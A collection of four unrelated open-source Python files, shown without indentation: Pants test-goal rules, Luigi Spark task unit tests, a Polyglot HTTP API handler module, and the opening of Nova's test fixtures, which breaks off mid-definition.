class ConsoleCoverageReport(CoverageReport):
"""Materializes a code coverage report to the terminal."""
report: str
def materialize(self, console: Console, workspace: Workspace) -> None:
console.print_stderr(f"\n{self.report}")
return None
@dataclass(frozen=True)
class FilesystemCoverageReport(CoverageReport):
"""Materializes a code coverage report to disk."""
result_snapshot: Snapshot
directory_to_materialize_to: PurePath
report_file: PurePath | None
report_type: str
def materialize(self, console: Console, workspace: Workspace) -> PurePath | None:
workspace.write_digest(
self.result_snapshot.digest, path_prefix=str(self.directory_to_materialize_to)
)
console.print_stderr(
f"\nWrote {self.report_type} coverage report to `{self.directory_to_materialize_to}`"
)
return self.report_file
def get_artifact(self) -> tuple[str, Snapshot] | None:
return f"coverage_{self.report_type}", self.result_snapshot
@dataclass(frozen=True)
class CoverageReports(EngineAwareReturnType):
reports: tuple[CoverageReport, ...]
@property
def coverage_insufficient(self) -> bool:
"""Whether to fail the build due to insufficient coverage."""
return any(report.coverage_insufficient for report in self.reports)
def materialize(self, console: Console, workspace: Workspace) -> tuple[PurePath, ...]:
report_paths = []
for report in self.reports:
report_path = report.materialize(console, workspace)
if report_path:
report_paths.append(report_path)
return tuple(report_paths)
def artifacts(self) -> dict[str, Snapshot | FileDigest] | None:
artifacts: dict[str, Snapshot | FileDigest] = {}
for report in self.reports:
artifact = report.get_artifact()
if not artifact:
continue
artifacts[artifact[0]] = artifact[1]
return artifacts or None
class TestSubsystem(GoalSubsystem):
name = "test"
help = "Run tests."
# Prevent this class from being detected by pytest as a test class.
__test__ = False
@classmethod
def activated(cls, union_membership: UnionMembership) -> bool:
return TestFieldSet in union_membership
debug = BoolOption(
"--debug",
default=False,
help=(
"Run tests sequentially in an interactive process. This is necessary, for "
"example, when you add breakpoints to your code."
),
)
force = BoolOption(
"--force",
default=False,
help="Force the tests to run, even if they could be satisfied from cache.",
)
output = EnumOption(
"--output",
default=ShowOutput.FAILED,
help="Show stdout/stderr for these tests.",
)
use_coverage = BoolOption(
"--use-coverage",
default=False,
help="Generate a coverage report if the test runner supports it.",
)
open_coverage = BoolOption(
"--open-coverage",
default=False,
help=(
"If a coverage report file is generated, open it on the local system if the "
"system supports this."
),
)
xml_dir = StrOption(
"--xml-dir",
metavar="<DIR>",
default=None,
advanced=True,
help=(
"Specifying a directory causes Junit XML result files to be emitted under "
"that dir for each test run that supports producing them."
),
)
extra_env_vars = StrListOption(
"--extra-env-vars",
help=(
"Additional environment variables to include in test processes. "
"Entries are strings in the form `ENV_VAR=value` to use explicitly; or just "
"`ENV_VAR` to copy the value of a variable in Pants's own environment."
),
)
class Test(Goal):
subsystem_cls = TestSubsystem
__test__ = False
@goal_rule
async def run_tests(
console: Console,
test_subsystem: TestSubsystem,
workspace: Workspace,
union_membership: UnionMembership,
dist_dir: DistDir,
run_id: RunId,
) -> Test:
if test_subsystem.debug:
targets_to_valid_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
TestFieldSet,
goal_description="`test --debug`",
no_applicable_targets_behavior=NoApplicableTargetsBehavior.error,
),
)
debug_requests = await MultiGet(
Get(TestDebugRequest, TestFieldSet, field_set)
for field_set in targets_to_valid_field_sets.field_sets
)
exit_code = 0
for debug_request, field_set in zip(debug_requests, targets_to_valid_field_sets.field_sets):
if debug_request.process is None:
logger.debug(f"Skipping tests for {field_set.address}")
continue
debug_result = await Effect(
InteractiveProcessResult, InteractiveProcess, debug_request.process
)
if debug_result.exit_code != 0:
exit_code = debug_result.exit_code
return Test(exit_code)
targets_to_valid_field_sets = await Get(
TargetRootsToFieldSets,
TargetRootsToFieldSetsRequest(
TestFieldSet,
goal_description=f"the `{test_subsystem.name}` goal",
no_applicable_targets_behavior=NoApplicableTargetsBehavior.warn,
),
)
results = await MultiGet(
Get(TestResult, TestFieldSet, field_set)
for field_set in targets_to_valid_field_sets.field_sets
)
# Print summary.
exit_code = 0
if results:
console.print_stderr("")
for result in sorted(results):
if result.skipped:
continue
if result.exit_code != 0:
exit_code = cast(int, result.exit_code)
console.print_stderr(_format_test_summary(result, run_id, console))
if result.extra_output and result.extra_output.files:
workspace.write_digest(
result.extra_output.digest,
path_prefix=str(dist_dir.relpath / "test" / result.address.path_safe_spec),
)
if test_subsystem.options.xml_dir:
xml_dir = test_subsystem.options.xml_dir
merged_xml_results = await Get(
Digest,
MergeDigests(result.xml_results.digest for result in results if result.xml_results),
)
workspace.write_digest(merged_xml_results, path_prefix=xml_dir)
console.print_stderr(f"\nWrote test XML to `{xml_dir}`")
if test_subsystem.use_coverage:
# NB: We must pre-sort the data for itertools.groupby() to work properly, using the same
# key function for both. However, you can't sort by `types`, so we call `str()` on it.
all_coverage_data = sorted(
(result.coverage_data for result in results if result.coverage_data is not None),
key=lambda cov_data: str(type(cov_data)),
)
coverage_types_to_collection_types = {
collection_cls.element_type: collection_cls # type: ignore[misc]
for collection_cls in union_membership.get(CoverageDataCollection)
}
coverage_collections = []
for data_cls, data in itertools.groupby(all_coverage_data, lambda data: type(data)):
collection_cls = coverage_types_to_collection_types[data_cls]
coverage_collections.append(collection_cls(data))
# We can create multiple reports for each coverage data (e.g., console, xml, html)
coverage_reports_collections = await MultiGet(
Get(CoverageReports, CoverageDataCollection, coverage_collection)
for coverage_collection in coverage_collections
)
coverage_report_files: list[PurePath] = []
for coverage_reports in coverage_reports_collections:
report_files = coverage_reports.materialize(console, workspace)
coverage_report_files.extend(report_files)
if coverage_report_files and test_subsystem.open_coverage:
open_files = await Get(
OpenFiles, OpenFilesRequest(coverage_report_files, error_if_open_not_found=False)
)
for process in open_files.processes:
_ = await Effect(InteractiveProcessResult, InteractiveProcess, process)
for coverage_reports in coverage_reports_collections:
if coverage_reports.coverage_insufficient:
logger.error(
"Test goal failed due to insufficient coverage. "
"See coverage reports for details."
)
# coverage.py uses 2 to indicate failure due to insufficient coverage.
# We may as well follow suit in the general case, for all languages.
exit_code = 2
return Test(exit_code)
_SOURCE_MAP = {
ProcessResultMetadata.Source.MEMOIZED: "memoized",
ProcessResultMetadata.Source.RAN_REMOTELY: "ran remotely",
ProcessResultMetadata.Source.HIT_LOCALLY: "cached locally",
ProcessResultMetadata.Source.HIT_REMOTELY: "cached remotely",
}
def _format_test_summary(result: TestResult, run_id: RunId, console: Console) -> str:
"""Format the test summary printed to the console."""
assert (
result.result_metadata is not None
), "Skipped test results should not be outputted in the test summary"
if result.exit_code == 0:
sigil = console.sigil_succeeded()
status = "succeeded"
else:
sigil = console.sigil_failed()
status = "failed"
source = _SOURCE_MAP.get(result.result_metadata.source(run_id))
source_print = f" ({source})" if source else ""
elapsed_print = ""
total_elapsed_ms = result.result_metadata.total_elapsed_ms
if total_elapsed_ms is not None:
elapsed_secs = total_elapsed_ms / 1000
elapsed_print = f"in {elapsed_secs:.2f}s"
suffix = f" {elapsed_print}{source_print}"
return f"{sigil} {result.address} {status}{suffix}."
@dataclass(frozen=True)
class TestExtraEnv:
env: Environment
@rule
async def get_filtered_environment(test_subsystem: TestSubsystem) -> TestExtraEnv:
return TestExtraEnv(await Get(Environment, EnvironmentRequest(test_subsystem.extra_env_vars)))
# -------------------------------------------------------------------------------------------
# `runtime_package_dependencies` field
# -------------------------------------------------------------------------------------------
class RuntimePackageDependenciesField(SpecialCasedDependencies):
alias = "runtime_package_dependencies"
help = (
f"Addresses to targets that can be built with the `{bin_name()} package` goal and whose "
"resulting artifacts should be included in the test run.\n\nPants will build the artifacts "
f"as if you had run `{bin_name()} package`. It will include the results in your test's chroot, "
"using the same name they would normally have, but without the `--distdir` prefix (e.g. "
f"`dist/`).\n\nYou can include anything that can be built by `{bin_name()} package`, e.g. a "
"`pex_binary`, `python_awslambda`, or an `archive`."
)
class BuiltPackageDependencies(Collection[BuiltPackage]):
pass
@dataclass(frozen=True)
class BuildPackageDependenciesRequest:
field: RuntimePackageDependenciesField
@rule(desc="Build runtime package dependencies for tests", level=LogLevel.DEBUG)
async def build_runtime_package_dependencies(
request: BuildPackageDependenciesRequest,
) -> BuiltPackageDependencies:
unparsed_addresses = request.field.to_unparsed_address_inputs()
if not unparsed_addresses:
return BuiltPackageDependencies()
tgts = await Get(Targets, UnparsedAddressInputs, unparsed_addresses)
field_sets_per_tgt = await Get(
FieldSetsPerTarget, FieldSetsPerTargetRequest(PackageFieldSet, tgts)
)
packages = await MultiGet(
Get(BuiltPackage, PackageFieldSet, field_set) for field_set in field_sets_per_tgt.field_sets
)
return BuiltPackageDependencies(packages)
def rules():
return [
*collect_rules(),
]
| |
# -*- coding: utf-8 -*-
#
# Copyright 2012-2015 Spotify AB
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
from helpers import unittest
import os
import luigi
import luigi.contrib.hdfs
from luigi import six
from luigi.mock import MockTarget
from helpers import with_config
from luigi.contrib.spark import SparkJobError, SparkSubmitTask, PySparkTask, PySpark1xJob, Spark1xJob, SparkJob
from mock import patch, MagicMock
BytesIO = six.BytesIO
def poll_generator():
yield None
yield 1
def setup_run_process(proc):
poll_gen = poll_generator()
proc.return_value.poll = lambda: next(poll_gen)
proc.return_value.returncode = 0
proc.return_value.stdout = BytesIO()
proc.return_value.stderr = BytesIO()
class TestSparkSubmitTask(SparkSubmitTask):
deploy_mode = "client"
name = "AppName"
entry_class = "org.test.MyClass"
jars = ["jars/my.jar"]
py_files = ["file1.py", "file2.py"]
files = ["file1", "file2"]
conf = {"Prop": "Value"}
properties_file = "conf/spark-defaults.conf"
driver_memory = "4G"
driver_java_options = "-Xopt"
driver_library_path = "library/path"
driver_class_path = "class/path"
executor_memory = "8G"
driver_cores = 8
supervise = True
total_executor_cores = 150
executor_cores = 10
queue = "queue"
num_executors = 2
archives = ["archive1", "archive2"]
app = "file"
def app_options(self):
return ["arg1", "arg2"]
def output(self):
return luigi.LocalTarget('output')
class TestDefaultSparkSubmitTask(SparkSubmitTask):
app = 'test.py'
def output(self):
return luigi.LocalTarget('output')
class TestPySparkTask(PySparkTask):
def input(self):
return MockTarget('input')
def output(self):
return MockTarget('output')
def main(self, sc, *args):
sc.textFile(self.input().path).saveAsTextFile(self.output().path)
class HdfsJob(luigi.ExternalTask):
def output(self):
return luigi.contrib.hdfs.HdfsTarget('test')
class TestSparkJob(SparkJob):
spark_workers = '2'
spark_master_memory = '1g'
spark_worker_memory = '1g'
def requires_hadoop(self):
return HdfsJob()
def jar(self):
return 'jar'
def job_class(self):
return 'job_class'
def output(self):
return luigi.LocalTarget('output')
class TestSpark1xJob(Spark1xJob):
def jar(self):
return 'jar'
def job_class(self):
return 'job_class'
def output(self):
return luigi.LocalTarget('output')
class TestPySpark1xJob(PySpark1xJob):
def program(self):
return 'python_file'
def output(self):
return luigi.LocalTarget('output')
class SparkSubmitTaskTest(unittest.TestCase):
ss = 'ss-stub'
@with_config({'spark': {'spark-submit': ss, 'master': "yarn-client", 'hadoop-conf-dir': 'path'}})
@patch('luigi.contrib.spark.subprocess.Popen')
def test_run(self, proc):
setup_run_process(proc)
job = TestSparkSubmitTask()
job.run()
self.assertEqual(proc.call_args[0][0],
['ss-stub', '--master', 'yarn-client', '--deploy-mode', 'client', '--name', 'AppName',
'--class', 'org.test.MyClass', '--jars', 'jars/my.jar', '--py-files', 'file1.py,file2.py',
'--files', 'file1,file2', '--archives', 'archive1,archive2', '--conf', 'Prop=Value',
'--properties-file', 'conf/spark-defaults.conf', '--driver-memory', '4G', '--driver-java-options', '-Xopt',
'--driver-library-path', 'library/path', '--driver-class-path', 'class/path', '--executor-memory', '8G',
'--driver-cores', '8', '--supervise', '--total-executor-cores', '150', '--executor-cores', '10',
'--queue', 'queue', '--num-executors', '2', 'file', 'arg1', 'arg2'])
@with_config({'spark': {'spark-submit': ss, 'master': 'spark://host:7077', 'conf': 'prop1=val1', 'jars': 'jar1.jar,jar2.jar',
'files': 'file1,file2', 'py-files': 'file1.py,file2.py', 'archives': 'archive1'}})
@patch('luigi.contrib.spark.subprocess.Popen')
def test_defaults(self, proc):
proc.return_value.returncode = 0
job = TestDefaultSparkSubmitTask()
job.run()
self.assertEqual(proc.call_args[0][0],
['ss-stub', '--master', 'spark://host:7077', '--jars', 'jar1.jar,jar2.jar',
'--py-files', 'file1.py,file2.py', '--files', 'file1,file2', '--archives', 'archive1',
'--conf', 'prop1=val1', 'test.py'])
@patch('luigi.contrib.spark.tempfile.TemporaryFile')
@patch('luigi.contrib.spark.subprocess.Popen')
def test_handle_failed_job(self, proc, file):
proc.return_value.returncode = 1
file.return_value = BytesIO(b'stderr')
try:
job = TestSparkSubmitTask()
job.run()
except SparkJobError as e:
self.assertEqual(e.err, 'stderr')
self.assertTrue('STDERR: stderr' in six.text_type(e))
else:
self.fail("Should have thrown SparkJobError")
@patch('luigi.contrib.spark.subprocess.Popen')
def test_app_must_be_set(self, proc):
with self.assertRaises(NotImplementedError):
job = SparkSubmitTask()
job.run()
@patch('luigi.contrib.spark.subprocess.Popen')
def test_app_interruption(self, proc):
def interrupt():
raise KeyboardInterrupt()
proc.return_value.wait = interrupt
try:
job = TestSparkSubmitTask()
job.run()
except KeyboardInterrupt:
pass
proc.return_value.kill.assert_called()
class PySparkTaskTest(unittest.TestCase):
ss = 'ss-stub'
@with_config({'spark': {'spark-submit': ss, 'master': "spark://host:7077"}})
@patch('luigi.contrib.spark.subprocess.Popen')
def test_run(self, proc):
setup_run_process(proc)
job = TestPySparkTask()
job.run()
proc_arg_list = proc.call_args[0][0]
self.assertEqual(proc_arg_list[0:7], ['ss-stub', '--master', 'spark://host:7077', '--deploy-mode', 'client', '--name', 'TestPySparkTask'])
self.assertTrue(os.path.exists(proc_arg_list[7]))
self.assertTrue(proc_arg_list[8].endswith('TestPySparkTask.pickle'))
@with_config({'spark': {'py-packages': 'dummy_test_module'}})
@patch.dict('sys.modules', {'pyspark': MagicMock()})
@patch('pyspark.SparkContext')
def test_pyspark_runner(self, spark_context):
sc = spark_context.return_value.__enter__.return_value
def mock_spark_submit(task):
from luigi.contrib.pyspark_runner import PySparkRunner
PySparkRunner(*task.app_command()[1:]).run()
# Check py-package exists
self.assertTrue(os.path.exists(sc.addPyFile.call_args[0][0]))
with patch.object(SparkSubmitTask, 'run', mock_spark_submit):
job = TestPySparkTask()
job.run()
sc.textFile.assert_called_with('input')
sc.textFile.return_value.saveAsTextFile.assert_called_with('output')
class SparkJobTest(unittest.TestCase):
hcd = 'hcd-stub'
ycd = 'ycd-stub'
sj = 'sj-stub'
sc = 'sc-sub'
@with_config({'spark': {'hadoop-conf-dir': hcd, 'yarn-conf-dir': ycd, 'spark-jar': sj, 'spark-class': sc}})
@patch('luigi.contrib.spark.subprocess.Popen')
@patch('luigi.contrib.hdfs.HdfsTarget')
def test_run(self, target, proc):
setup_run_process(proc)
job = TestSparkJob()
job.run()
self.assertEqual(proc.call_args[0][0], [self.sc, 'org.apache.spark.deploy.yarn.Client', '--jar', job.jar(), '--class', job.job_class(),
'--num-workers', '2', '--master-memory', '1g', '--worker-memory', '1g'])
@with_config({'spark': {'hadoop-conf-dir': hcd, 'yarn-conf-dir': ycd, 'spark-jar': sj, 'spark-class': sc}})
@patch('luigi.contrib.spark.tempfile.TemporaryFile')
@patch('luigi.contrib.spark.subprocess.Popen')
def test_handle_failed_job(self, proc, file):
proc.return_value.returncode = 1
file.return_value = BytesIO(b'stderr')
try:
job = TestSparkJob()
job.run()
except SparkJobError as e:
self.assertEqual(e.err, 'stderr')
self.assertTrue('STDERR: stderr' in six.text_type(e))
else:
self.fail("Should have thrown SparkJobError")
class Spark1xTest(unittest.TestCase):
ss = 'ss-stub'
@with_config({'spark': {'spark-submit': ss}})
@patch('luigi.contrib.spark.subprocess.Popen')
def test_run(self, proc):
setup_run_process(proc)
job = TestSpark1xJob()
job.run()
self.assertEqual(proc.call_args[0][0], [self.ss, '--master', 'yarn-client', '--class', job.job_class(), job.jar()])
@with_config({'spark': {'spark-submit': ss}})
@patch('luigi.contrib.spark.tempfile.TemporaryFile')
@patch('luigi.contrib.spark.subprocess.Popen')
def test_handle_failed_job(self, proc, file):
proc.return_value.returncode = 1
file.return_value = BytesIO(b'stderr')
try:
job = TestSpark1xJob()
job.run()
except SparkJobError as e:
self.assertEqual(e.err, 'stderr')
self.assertTrue('STDERR: stderr' in six.text_type(e))
else:
self.fail("Should have thrown SparkJobError")
class PySpark1xTest(unittest.TestCase):
ss = 'ss-stub'
@with_config({'spark': {'spark-submit': ss}})
@patch('luigi.contrib.spark.subprocess.Popen')
def test_run(self, proc):
setup_run_process(proc)
job = TestPySpark1xJob()
job.run()
self.assertEqual(proc.call_args[0][0], [self.ss, '--master', 'yarn-client', job.program()])
@with_config({'spark': {'spark-submit': ss}})
@patch('luigi.contrib.spark.tempfile.TemporaryFile')
@patch('luigi.contrib.spark.subprocess.Popen')
def test_handle_failed_job(self, proc, file):
proc.return_value.returncode = 1
file.return_value = BytesIO(b'stderr')
try:
job = TestPySpark1xJob()
job.run()
except SparkJobError as e:
self.assertEqual(e.err, 'stderr')
self.assertTrue('STDERR: stderr' in six.text_type(e))
else:
self.fail("Should have thrown SparkJobError")
| |
''' Polyglot API definition '''
# pylint: disable=no-name-in-module, import-error
import json
import logging
# from polyglot.element_manager import http
import http
import polyglot.nodeserver_helpers as nshelpers
_LOGGER = logging.getLogger(__name__)
CONFIG = {}
PGLOT = None
def load(pglot, user_config):
''' setup the API handlers '''
# pylint: disable=global-statement, unused-argument
global PGLOT
# register addresses with server
http.register(HANDLERS, parent_dir='api')
# Register Polyglot application
PGLOT = pglot
_LOGGER.info('Loaded API element')
def unload():
''' stops the http server '''
_LOGGER.info('Unloaded API element')
def get_config():
""" Returns the element's configuration. """
return {}
def set_config(config):
""" Updates the current configuration. """
# pylint: disable=unused-argument
pass
class GenericAPIHandler(http.AbstractHandler):
""" Generic Handler that verifies Node Server. """
STATUS = {200: 'HTTP_OK', 400: 'BAD_REQUEST', 404: 'HTTP_NOT_FOUND'}
def __init__(self, *args, **kwargs):
super(GenericAPIHandler, self).__init__(*args, **kwargs)
self.node_server = None
self.store = None
self.request_id = None
def send_not_found(self):
''' sends a not found response back to the client. '''
self.send_json({}, 404)
def send_json(self, data=None, status=200, message=None):
'''
sends json payload to as a response.
:param data: Payload to send to client
:param status: Status code to send to client
'''
if not data:
data = {}
self.set_status(status, self.STATUS[status])
output = ({'success': status < 300, 'payload': data})
if message:
output['message'] = str(message)
self.write(json.dumps(output))
self.finish()
def send_zip(self, fname, data):
''' Sends zip data to client. '''
self.set_status(200, 'HTTP_OK')
self.set_header('Content-Type', 'application/zip')
self.set_header(
'Content-Disposition', 'attachment; filename={}'.format(fname))
self.write(data)
self.finish()
def send_txt(self, data):
''' Sends zip data to client. '''
self.set_status(200, 'HTTP_OK')
self.set_header('Content-Type', 'text/plain')
self.write(data)
self.finish()
class ConfigHandler(GenericAPIHandler):
''' /config '''
def get(self):
''' worker '''
config = PGLOT.elements.config
config['pgver'] = PGLOT.version
self.send_json(config)
class ConfigSetHTTPHandler(GenericAPIHandler):
''' /config/set/http '''
def get(self):
''' worker '''
config = {'username': self.get_argument('username'),
'password': self.get_argument('password'),
'port': int(self.get_argument('port'))}
if config['port'] <= 1024:
self.send_json(message='Port must be greater than 1024',
status=400)
return
PGLOT.elements.set_config({'http': config})
self.send_json()
class ConfigSetISYHandler(GenericAPIHandler):
''' /config/set/isy '''
def get(self):
''' worker '''
config = {'username': self.get_argument('username'),
'password': self.get_argument('password'),
'address': self.get_argument('address'),
'port': int(self.get_argument('port')),
'https': self.get_argument('https', 'off') == 'on'}
PGLOT.elements.set_config({'isy': config})
self.send_json()
class ServersAvailableHandler(GenericAPIHandler):
''' /servers/available '''
def get(self):
''' worker '''
servers = nshelpers.available_servers()
payload = [{'platform': key, 'name': val['name']}
for key, val in servers.items()]
self.send_json(payload)
class ServersAddHandler(GenericAPIHandler):
''' /servers/add '''
def get(self):
''' worker '''
nsdata = {'nsname': self.get_argument('name'),
'profile_number': int(self.get_argument('nsid')),
'ns_platform': self.get_argument('type')}
try:
PGLOT.nodeservers.start_server(**nsdata)
self.send_json()
except ValueError as err:
self.send_json(message=err.args[0], status=400)
class ServersActiveHandler(GenericAPIHandler):
''' /servers/active '''
def get(self):
''' worker '''
servers = [{'id': key, 'name': val.name,
'running': val.alive and val.responding}
for key, val in PGLOT.nodeservers.servers.items()]
self.send_json(servers)
class ServerHandler(GenericAPIHandler):
''' /server/([A-Za-z0-9]+) '''
def get(self, base_url):
''' worker '''
if base_url in PGLOT.nodeservers.servers:
self.send_json(PGLOT.nodeservers.servers[base_url].definition)
else:
self.send_not_found()
class ServerProfileHandler(GenericAPIHandler):
''' /server/([A-Za-z0-9]+)/profile '''
def get(self, base_url):
''' worker '''
if base_url in PGLOT.nodeservers.servers:
profile = PGLOT.nodeservers.servers[base_url].profile
name = PGLOT.nodeservers.servers[base_url].name
self.send_zip('{}_profile.zip'.format(name), profile)
else:
self.send_not_found()
class ServerRestartHandler(GenericAPIHandler):
''' /server/([A-Za-z0-9]+)/restart '''
def get(self, base_url):
''' worker '''
if base_url in PGLOT.nodeservers.servers:
PGLOT.nodeservers.servers[base_url].restart()
self.send_json()
else:
self.send_not_found()
class ServerDeleteHandler(GenericAPIHandler):
''' /server/([A-Za-z0-9]+)/delete '''
def get(self, base_url):
''' worker '''
if base_url in PGLOT.nodeservers.servers:
PGLOT.nodeservers.delete(base_url)
self.send_json()
else:
self.send_not_found()
class LogHandler(GenericAPIHandler):
''' /log.txt '''
def get(self):
''' worker '''
text = PGLOT.get_log()
self.send_txt(text)
HANDLERS = [ConfigHandler, ConfigSetHTTPHandler, ConfigSetISYHandler,
ServersAvailableHandler, ServersAddHandler, ServersActiveHandler,
ServerHandler, ServerProfileHandler, ServerRestartHandler,
ServerDeleteHandler, LogHandler]
| |
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""Fixtures for Nova tests."""
from __future__ import absolute_import
import collections
from contextlib import contextmanager
import logging as std_logging
import os
import warnings
import fixtures
from keystoneauth1 import session as ks
import mock
from oslo_concurrency import lockutils
from oslo_config import cfg
import oslo_messaging as messaging
from oslo_messaging import conffixture as messaging_conffixture
from requests import adapters
from wsgi_intercept import interceptor
from nova.api.openstack.compute import tenant_networks
from nova.api.openstack.placement import deploy as placement_deploy
from nova.compute import rpcapi as compute_rpcapi
from nova import context
from nova.db import migration
from nova.db.sqlalchemy import api as session
from nova import exception
from nova.network import model as network_model
from nova import objects
from nova.objects import base as obj_base
from nova.objects import service as service_obj
from nova import quota as nova_quota
from nova import rpc
from nova import service
from nova.tests.functional.api import client
from nova.tests import uuidsentinel
_TRUE_VALUES = ('True', 'true', '1', 'yes')
CONF = cfg.CONF
DB_SCHEMA = {'main': "", 'api': ""}
SESSION_CONFIGURED = False
class ServiceFixture(fixtures.Fixture):
"""Run a service as a test fixture."""
def __init__(self, name, host=None, **kwargs):
name = name
# If not otherwise specified, the host will default to the
# name of the service. Some things like aggregates care that
# this is stable.
host = host or name
kwargs.setdefault('host', host)
kwargs.setdefault('binary', 'nova-%s' % name)
self.kwargs = kwargs
def setUp(self):
super(ServiceFixture, self).setUp()
self.service = service.Service.create(**self.kwargs)
self.service.start()
self.addCleanup(self.service.kill)
class NullHandler(std_logging.Handler):
"""custom default NullHandler to attempt to format the record.
Used in conjunction with
log_fixture.get_logging_handle_error_fixture to detect formatting errors in
debug level logs without saving the logs.
"""
def handle(self, record):
self.format(record)
def emit(self, record):
pass
def createLock(self):
self.lock = None
class StandardLogging(fixtures.Fixture):
"""Setup Logging redirection for tests.
There are a number of things we want to handle with logging in tests:
* Redirect the logging to somewhere that we can test or dump it later.
* Ensure that as many DEBUG messages as possible are actually
executed, to ensure they are actually syntactically valid (they
often have not been).
* Ensure that we create useful output for tests that doesn't
overwhelm the testing system (which means we can't capture the
100 MB of debug logging on every run).
To do this we create a logger fixture at the root level, which
defaults to INFO and create a Null Logger at DEBUG which lets
us execute log messages at DEBUG but not keep the output.
To support local debugging OS_DEBUG=True can be set in the
environment, which will print out the full debug logging.
There are also a set of overrides for particularly verbose
modules to be even less than INFO.
"""
def setUp(self):
super(StandardLogging, self).setUp()
# set root logger to debug
root = std_logging.getLogger()
root.setLevel(std_logging.DEBUG)
# supports collecting debug level for local runs
if os.environ.get('OS_DEBUG') in _TRUE_VALUES:
level = std_logging.DEBUG
else:
level = std_logging.INFO
# Collect logs
fs = '%(asctime)s %(levelname)s [%(name)s] %(message)s'
self.logger = self.useFixture(
fixtures.FakeLogger(format=fs, level=None))
# TODO(sdague): why can't we send level through the fake
# logger? Tests prove that it breaks, but it's worth getting
# to the bottom of.
root.handlers[0].setLevel(level)
if level > std_logging.DEBUG:
# Just attempt to format debug level logs, but don't save them
handler = NullHandler()
self.useFixture(fixtures.LogHandler(handler, nuke_handlers=False))
handler.setLevel(std_logging.DEBUG)
# Don't log every single DB migration step
std_logging.getLogger(
'migrate.versioning.api').setLevel(std_logging.WARNING)
# At times we end up calling back into main() functions in
# testing. This has the possibility of calling logging.setup
# again, which completely unwinds the logging capture we've
# created here. Once we've setup the logging the way we want,
# disable the ability for the test to change this.
def fake_logging_setup(*args):
pass
self.useFixture(
fixtures.MonkeyPatch('oslo_log.log.setup', fake_logging_setup))
class OutputStreamCapture(fixtures.Fixture):
"""Capture output streams during tests.
This fixture captures errant printing to stderr / stdout during
the tests and lets us see those streams at the end of the test
runs instead. Useful to see what was happening during failed
tests.
"""
def setUp(self):
super(OutputStreamCapture, self).setUp()
if os.environ.get('OS_STDOUT_CAPTURE') in _TRUE_VALUES:
self.out = self.useFixture(fixtures.StringStream('stdout'))
self.useFixture(
fixtures.MonkeyPatch('sys.stdout', self.out.stream))
if os.environ.get('OS_STDERR_CAPTURE') in _TRUE_VALUES:
self.err = self.useFixture(fixtures.StringStream('stderr'))
self.useFixture(
fixtures.MonkeyPatch('sys.stderr', self.err.stream))
@property
def stderr(self):
return self.err._details["stderr"].as_text()
@property
def stdout(self):
return self.out._details["stdout"].as_text()
class Timeout(fixtures.Fixture):
"""Setup per test timeouts.
In order to avoid test deadlocks we support setting up a test
timeout parameter read from the environment. In almost all
cases where the timeout is reached this means a deadlock.
A class level TIMEOUT_SCALING_FACTOR also exists, which allows
extremely long tests to specify they need more time.
"""
def __init__(self, timeout, scaling=1):
super(Timeout, self).__init__()
try:
self.test_timeout = int(timeout)
except ValueError:
# If timeout value is invalid do not set a timeout.
self.test_timeout = 0
if scaling >= 1:
self.test_timeout *= scaling
else:
raise ValueError('scaling value must be >= 1')
def setUp(self):
super(Timeout, self).setUp()
if self.test_timeout > 0:
self.useFixture(fixtures.Timeout(self.test_timeout, gentle=True))
class DatabasePoisonFixture(fixtures.Fixture):
def setUp(self):
super(DatabasePoisonFixture, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'oslo_db.sqlalchemy.enginefacade._TransactionFactory.'
'_create_session',
self._poison_configure))
def _poison_configure(self, *a, **k):
# If you encounter this error, you might be tempted to just not
# inherit from NoDBTestCase. Bug #1568414 fixed a few hundred of these
# errors, and not once was that the correct solution. Instead,
# consider some of the following tips (when applicable):
#
# - mock at the object layer rather than the db layer, for example:
# nova.objects.instance.Instance.get
# vs.
# nova.db.instance_get
#
# - mock at the api layer rather than the object layer, for example:
# nova.api.openstack.common.get_instance
# vs.
# nova.objects.instance.Instance.get
#
# - mock code that requires the database but is otherwise tangential
# to the code you're testing (for example: EventReporterStub)
#
# - peruse some of the other database poison warning fixes here:
# https://review.openstack.org/#/q/topic:bug/1568414
raise Exception('This test uses methods that set internal oslo_db '
'state, but it does not claim to use the database. '
'This will conflict with the setup of tests that '
'do use the database and cause failures later.')
class SingleCellSimple(fixtures.Fixture):
"""Setup the simplest cells environment possible
This should be used when you do not care about multiple cells,
or having a "real" environment for tests that should not care.
This will give you a single cell, and map any and all accesses
to that cell (even things that would go to cell0).
If you need to distinguish between cell0 and cellN, then you
should use the CellDatabases fixture.
If instances should appear to still be in scheduling state, pass
instances_created=False to init.
"""
def __init__(self, instances_created=True):
self.instances_created = instances_created
def setUp(self):
super(SingleCellSimple, self).setUp()
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMappingList._get_all_from_db',
self._fake_cell_list))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.CellMapping._get_by_uuid_from_db',
self._fake_cell_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.HostMapping._get_by_host_from_db',
self._fake_hostmapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._get_by_instance_uuid_from_db',
self._fake_instancemapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMappingList._get_by_instance_uuids_from_db',
self._fake_instancemapping_get_uuids))
self.useFixture(fixtures.MonkeyPatch(
'nova.objects.InstanceMapping._save_in_db',
self._fake_instancemapping_get))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.target_cell',
self._fake_target_cell))
self.useFixture(fixtures.MonkeyPatch(
'nova.context.set_target_cell',
lambda c, m: None))
def _fake_hostmapping_get(self, *args):
